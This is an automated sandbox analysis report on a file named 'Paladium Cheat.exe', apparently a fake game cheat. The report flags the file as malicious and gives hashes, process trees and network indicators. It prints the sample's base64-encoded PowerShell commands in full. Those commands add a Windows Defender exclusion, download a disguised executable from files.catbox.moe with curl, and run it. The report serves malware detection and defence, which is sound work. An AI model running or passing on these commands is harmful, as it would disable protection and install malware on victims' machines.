File name:

Paladium Cheat.exe

Full analysis: https://app.any.run/tasks/03dde04a-8691-4e08-a82c-4210cb00f079
Verdict: Malicious activity
Analysis date: June 21, 2025, 16:47:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 17 sections
MD5:

A912E723D2B25B3028A260319B747A0E

SHA1:

C94C8D56B21B132E05F08C478269889C7D6FB1B0

SHA256:

30A5D79B2C347C8BEC73C1297FF6935089FB7CA96B43EDC88F227C148B41581F

SSDEEP:

12288:WDurDnM/nnnKOxUkU8U+sjGh56Olx/afagresSv/jv+J0oAx:MurDnMyOxUkU8U+sjGh56OD/a8jv+J0F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes Windows Defender settings

      • powershell.exe (PID: 6260)
    • Adds path to the Windows Defender exclusion list

      • powershell.exe (PID: 6260)
  • SUSPICIOUS

    • BASE64 encoded PowerShell command has been detected

      • Paladium Cheat.exe (PID: 2680)
      • powershell.exe (PID: 3652)
    • Starts POWERSHELL.EXE for commands execution

      • Paladium Cheat.exe (PID: 2680)
      • powershell.exe (PID: 3652)
      • powershell.exe (PID: 6260)
    • Application launched itself

      • powershell.exe (PID: 3652)
      • powershell.exe (PID: 6260)
    • Base64-obfuscated command line is found

      • Paladium Cheat.exe (PID: 2680)
      • powershell.exe (PID: 3652)
    • Script adds exclusion path to Windows Defender

      • powershell.exe (PID: 6260)
    • Manipulates environment variables

      • powershell.exe (PID: 6524)
    • Execution of CURL command (POWERSHELL)

      • powershell.exe (PID: 6260)
  • INFO

    • Checks supported languages

      • Paladium Cheat.exe (PID: 2680)
    • Disables trace logs

      • powershell.exe (PID: 6260)
    • Checks proxy server information

      • powershell.exe (PID: 6260)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6524)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6524)
      • powershell.exe (PID: 6260)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 3652)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 6260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, No line numbers, Large address aware
PEType: PE32+
LinkerVersion: 2.44
CodeSize: 110592
InitializedDataSize: 52224
UninitializedDataSize: 3584
EntryPoint: 0x131a
OSVersion: 4
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
144
Monitored processes
9
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start paladium cheat.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe powershell.exe conhost.exe no specs slui.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2680"C:\Users\admin\AppData\Local\Temp\Paladium Cheat.exe" C:\Users\admin\AppData\Local\Temp\Paladium Cheat.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\paladium cheat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2976C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3652powershell -e cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQAgAFkAdwBCAGsAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEUARQBBAGMAQQBCAHcAQQBFAFEAQQBZAFEAQgAwAEEARwBFAEEAQwBnAEEASwBBAEgATQBBAGQAQQBCAGgAQQBIAEkAQQBkAEEAQQBnAEEASABBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAHoAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEEAdABBAEUARQBBAGMAZwBCAG4AQQBIAFUAQQBiAFEAQgBsAEEARwA0AEEAZABBAEIATQBBAEcAawBBAGMAdwBCADAAQQBDAEEAQQBKAHcAQgBCAEEARwBRAEEAWgBBAEEAdABBAEUAMABBAGMAQQBCAFEAQQBIAEkAQQBaAFEAQgBtAEEARwBVAEEAYwBnAEIAbABBAEcANABBAFkAdwBCAGwAQQBDAEEAQQBMAFEAQgBGAEEASABnAEEAWQB3AEIAcwBBAEgAVQBBAGMAdwBCAHAAQQBHADgAQQBiAGcAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARQBFAEEAYwBBAEIAdwBBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBKAHcAQQBnAEEAQwAwAEEAVgBnAEIAbABBAEgASQBBAFkAZwBBAGcAQQBIAEkAQQBkAFEAQgB1AEEARQBFAEEAYwB3AEEASwBBAEEAbwBBAFkAdwBCADEAQQBIAEkAQQBiAEEAQQBnAEEAQwAwAEEAYgB3AEEAZwBBAEUARQBBAGQAUQBCAGsAQQBHAGsAQQBiAHcAQgBUAEEASABrAEEAVQB3AEIARQBBAEgASQBBAGEAUQBCADIAQQBHAFUAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAQQBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBjAHcAQQB1AEEARwBNAEEAWQBRAEIAMABBAEcASQBBAGIAdwBCADQAQQBDADQAQQBiAFEAQgB2AEEARwBVAEEATAB3AEIAaABBAEcASQBBAGMAQQBCAHEAQQBEAEUAQQBhAHcAQQB1AEEASABBAEEAYgBnAEIAbgBBAEEAbwBBAEMAZwBCAHoAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEASQBBAEEAaQBBAEMAUQBBAFoAUQBCAHUAQQBIAFkAQQBPAGcAQgBCAEEASABBAEEAYwBBAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBRAFEAQgAxAEEARwBRAEEAYQBRAEIAdgBBAEYATQBBAGUAUQBCAFQAQQBFAFEAQQBjAGcAQgBwAEEASABZAEEAWgBRAEIAeQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQBJAGcAQQA9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePaladium Cheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
4192\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4748\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exePaladium Cheat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6260"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -e YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEACgAKAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAJwAgAC0AVgBlAHIAYgAgAHIAdQBuAEEAcwAKAAoAYwB1AHIAbAAgAC0AbwAgAEEAdQBkAGkAbwBTAHkAUwBEAHIAaQB2AGUAcgAuAGUAeABlACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAGMAYQB0AGIAbwB4AC4AbQBvAGUALwBhAGIAcABqADEAawAuAHAAbgBnAAoACgBzAHQAYQByAHQAIAAiACQAZQBuAHYAOgBBAHAAcABEAGEAdABhAFwAQQB1AGQAaQBvAFMAeQBTAEQAcgBpAHYAZQByAC4AZQB4AGUAIgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
6524"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:AppData C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
Total events
15 294
Read events
15 294
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
6260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1l14vr2k.lf1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6260powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wm0r3bzf.e2m.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6524powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nrst2xhx.423.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF176d31.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
6524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\68IUMSL6LW6OZYY66C6S.tempbinary
MD5:E57883858E61172C1800D9230AD7C151
SHA256:3F3D9CF22C5C2EAF1ECE82EA5F45ECD8CD067DC7C8A9CA62EB849440F09F062C
6524powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:E57883858E61172C1800D9230AD7C151
SHA256:3F3D9CF22C5C2EAF1ECE82EA5F45ECD8CD067DC7C8A9CA62EB849440F09F062C
6524powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ndduoyq.xcq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6524powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:B88279BEF142FFE88D737D85693F6500
SHA256:5B14E6240422F226A5211581EDBF8B715B4BEDCEDB89A3C730FB10A6A8CB958A
3652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rcceczjs.eri.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3652powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yv1l3lo0.b5z.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
21
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.55.104.172:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6348
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6348
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7020
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3572
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
6260
powershell.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
malicious
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
23.55.104.172:80
crl.microsoft.com
Akamai International B.V.
US
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.46
whitelisted
files.catbox.moe
  • 108.181.20.35
malicious
crl.microsoft.com
  • 23.55.104.172
  • 23.55.104.190
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted
login.live.com
  • 20.190.159.0
  • 20.190.159.2
  • 40.126.31.71
  • 20.190.159.68
  • 40.126.31.3
  • 40.126.31.0
  • 40.126.31.1
  • 20.190.159.71
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted

Threats

No threats detected
No debug info